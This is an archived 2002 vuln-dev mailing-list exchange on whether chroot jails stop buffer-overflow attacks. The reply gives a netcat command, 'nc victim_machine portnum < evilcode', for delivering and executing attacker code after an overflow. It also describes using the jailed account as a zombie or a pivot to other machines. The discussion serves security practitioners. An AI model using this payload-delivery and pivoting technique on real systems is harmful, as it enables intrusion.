Re: OT? Are chroots immune to buffer overflows?

From: Adam Lydick (lydickaw@hotmail.com)
Date: 05/22/02 

From: "Adam Lydick" <lydickaw@hotmail.com>
To: Jason.Haar@trimble.co.nz, vuln-dev@securityfocus.com
Date: Wed, 22 May 2002 13:26:44 -0400

Sure it can. Just have the bootstrap code (the overflow) download a binary
from the attacker's machine:
'nc victim_machine portnum < evilcode'

Then exec the code. All the calls you need are in libc, which is almost
certainly loaded by the overflowed program. You have a chrooted, local
account that can still be used as a zombie for attacks or masking your true
location... (Or as a stepping stone for attacking more powerful accounts /
machines on the local network)

Adam

>From: Jason Haar <Jason.Haar@trimble.co.nz>
>To: vuln-dev@securityfocus.com
>Subject: OT? Are chroots immune to buffer overflows?
>Date: Wed, 22 May 2002 15:48:16 +1200
>
>[note: my question is WRT non-root chrooted jails - we all know about
>chroot'ing root processes!]
>
>Most buffer overflows I've seen attempt to infiltrate the system enough to
>run /bin/sh. In chroot'ed environments, /bin/sh doesn't (shouldn't!) exist
>-
>so they fail.
>
>Is it as simple as that? As 99.999% of the system binaries aren't available
>in the jail, can a buffer overflow ever work?
>
>--
>Cheers
>
>Jason Haar
>
>Information Security Manager
>Trimble Navigation Ltd.
>Phone: +64 3 9635 377 Fax: +64 3 9635 417

_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com

Quantcast